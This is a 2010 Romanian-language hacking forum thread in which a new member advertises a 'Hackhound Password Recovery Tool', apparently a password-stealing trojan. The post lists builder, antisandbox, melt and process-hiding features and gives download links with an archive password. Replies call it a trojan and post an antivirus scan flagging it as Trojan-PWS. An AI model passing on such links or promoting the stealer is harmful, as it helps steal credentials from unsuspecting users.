thuglife1 Posted February 8, 2010 Report Posted February 8, 2010 [Release] New Hackhound Password Recovery ToolUpdate Logs+BETA 2: - Added Send once - Added Many Sqlite3.dll path for chrome pass - Fix bug In Sender logs+BETA 3: - Recoded Stub (Prepare For Private Version) - Added Tester Send At Builder - Change Sendlogs Method+BETA 4: - New Banner Thanks need4weeduk - Fix Problem At Antisandbox (wrong result make server not run)+Release: - Fix Password Recovery Tool Space - Fix Firefox Recovered - Added Exploit FF ( Private Only ) - Added Melt ( Private Only ) - Added Hiding Procces Tested Xpsp3 ( Private Only )All Feture U can See in Pictureu can download herehttp://rapidshare.com/files/347507047/_Release_Hackhound_Stealer.rarpassword : h7labs.comNB :For help dev, please post in this thread your feedback like thisWorking : Good / ErrorOS : windows xp/vista/7machine : 32/64 bitif error : whats your Setup configurationTutorial Setup PHPPAGEhttp://rapidshare.com/files/277616309/tut.rar.html Quote
alexu Posted February 8, 2010 Report Posted February 8, 2010 Ban ? ( The message you have entered is too short. ) Quote
alexu Posted February 8, 2010 Report Posted February 8, 2010 Nu e vorba ca are doar 1 post , dar cand pui nume " Password Recovery Tool " la un amarat de trojan psw , detectat de toata planeta , ne ia de prosti Quote
Nytro Posted February 8, 2010 Report Posted February 8, 2010 3 reply-uri, 3 avertismente. Aduceti si argumente, macar o scanare pe novirusthanks/virustotal. Sau analizati voi fisierele.Cine descarca, descarca pe pripriul risc, nu sta nimeni sa verifice daca e infectat sau nu. Quote
vizitatoru123 Posted February 8, 2010 Report Posted February 8, 2010 hmmm....File InfoReport generated: 16.10.2009 at 0.53.56 (GMT 1)Filename: HackHound.rarFile size: 1984214MD5 Hash: 6148229de6f38083fc888a29c7a8f660SHA1 Hash: 7A47DD7AA621E0519A763CDA3E7E18E690BB8B07Self-Extract Archive: Nothing foundBinder Detector: Nothing foundDetection rate: 17 on 23Detectionsa-squared - Trojan-PWS.Win32.Agent!IKAvira AntiVir - TR/Spy.Agent.cccrAvast - Win32:Agent-AGQA [Trj]AVG - Dropper.Agent.MGQBitDefender - Trojan.Generic.1625648ClamAV - Trojan.Agent-117106Comodo - TrojWare.Win32.PSW.Agent.~SZXDr.Web - Trojan.Siggen.2245Ewido - -F-PROT6 - W32/Dropper.AHHS (exact, dropper, not disinfectable)Ikarus T3 - Trojan-PWS.Win32.AgentKaspersky - Trojan.Win32.Agent.cccrMcAfee - Spy-Agent.ef trojanNOD32 v3 - Win32/PSW.Agent.NLYNorman - -Panda - -QuickHeal - Trojan.Agent.cccrSolo Antivirus - -Sophos - Mal/Generic-ETrendMicro - -VBA32 - Trojan-Dropper.Win32.ResgenVirusBuster - TrojanSpy.Agent.NPXT Quote
CrashOverline Posted February 8, 2010 Report Posted February 8, 2010 Nu spun ca e stealer, spun doar ca:-pe hackhound nu am vazut nimic de un nou " Hackhound Password Recovery Tool".-daca este nou "new", de ce e detectat de atati antivirusi?-daca se numeste " Hackhound Password Recovery Tool", de ce in imagine scrie "Hackhound Stealer".-de ce nu a postat cineva mai mare, adica cu mai multe posturi acest " Hackhound Password Recovery Tool"?-cine este thuglife1?@sickness: in citatul tau de la semnatura, Kevin se refera la Back Track 3???(sunt doar curios)@Nytro: nu ar fi bine sa restrictionati postarea de programe pt cei care au sub 50 posturi, doar o sugestie. (mai bine mai putine posturi de calitate decat multe si proaste, parerea mea ) Quote
vizitatoru123 Posted February 8, 2010 Report Posted February 8, 2010 Nu spun ca e stealer, spun doar ca:-pe hackhound nu am vazut nimic de un nou " Hackhound Password Recovery Tool".-daca este nou "new", de ce e detectat de atati antivirusi?-daca se numeste " Hackhound Password Recovery Tool", de ce in imagine scrie "Hackhound Stealer".-de ce nu a postat cineva mai mare, adica cu mai multe posturi acest " Hackhound Password Recovery Tool"?-cine este thuglife1?@sickness: in citatul tau de la semnatura, Kevin se refera la Back Track 3???(sunt doar curios)@Nytro: nu ar fi bine sa restrictionati postarea de programe pt cei care au sub 50 posturi, doar o sugestie. (mai bine mai putine posturi de calitate decat multe si proaste, parerea mea )La chestia asta sunt de acord cu tine. Eu am pus acolo cum detecteaza antivirusi deci Si da, se refera la BT3, dar banuiesc ca se pune la toate . Quote
Paul4games Posted February 8, 2010 Report Posted February 8, 2010 Nu spun ca e stealer, spun doar ca:-pe hackhound nu am vazut nimic de un nou " Hackhound Password Recovery Tool".-daca este nou "new", de ce e detectat de atati antivirusi?-daca se numeste " Hackhound Password Recovery Tool", de ce in imagine scrie "Hackhound Stealer".-de ce nu a postat cineva mai mare, adica cu mai multe posturi acest " Hackhound Password Recovery Tool"?-cine este thuglife1?@sickness: in citatul tau de la semnatura, Kevin se refera la Back Track 3???(sunt doar curios)@Nytro: nu ar fi bine sa restrictionati postarea de programe pt cei care au sub 50 posturi, doar o sugestie. (mai bine mai putine posturi de calitate decat multe si proaste, parerea mea )Frate daca nu sti mai bine taci yi faci probleme omului degea auzi ca nu exista un new hackhoun pasword recovery tooll (atunci asta cei?: Login).Poate primeste ala warn sau ban din cauza ta ca nici search nu sti sa dai pe hackhound Quote
Paul4games Posted February 8, 2010 Report Posted February 8, 2010 Este adevarat ca acea versiune este din Mai anu trecut dar exista ,postata de creatorul stealerului Quote
CrashOverline Posted February 8, 2010 Report Posted February 8, 2010 (edited) Frate daca nu sti mai bine taci yi faci probleme omului degea auzi ca nu exista un new hackhoun pasword recovery tooll (atunci asta cei?: Login).Poate primeste ala warn sau ban din cauza ta ca nici search nu sti sa dai pe hackhound------------------------------------------------------------------------------------------------------Este adevarat ca acea versiune este din Mai anu trecut dar exista ,postata de creatorul stealeruluiNu spun ca e stealer, spun doar ca:-pe hackhound nu am vazut nimic de un nou " Hackhound Password Recovery Frate daca nu sti mai bine taci...Poate isi pierd unii conturile din cauza ta.-------------------------------------------------ps:Vezi ca ai facut dublupost. Edited February 8, 2010 by CrashOverline Quote
Paul4games Posted February 8, 2010 Report Posted February 8, 2010 Cine isi pierde contu din cauza mea?haio ca ma si enervezi eu doar tiam zis ca postezi prosti, ai intrat sa vezi ca exista pe hackhound topicu cu acest stealer? Quote
CrashOverline Posted February 8, 2010 Report Posted February 8, 2010 Cine isi pierde contu din cauza mea?haio ca ma si enervezi eu doar tiam zis ca postezi prosti, ai intrat sa vezi ca exista pe hackhound topicu cu acest stealer?Ai intrat si ai vazut ca stealeru pus pe hackhound e de 3 ori mai mare decat cel postat aici?Nu vreau sa ne certam din cauza unuia care a venit la furat.Am incheiat si asa am facut prea mult offtopic. Quote
Paul4games Posted February 8, 2010 Report Posted February 8, 2010 Eu nu am verificat stealeru lui pentru ca am eu stealerele mele dar eu am vrut sa iti arat ca pe hackhound exista acest stealer:D Quote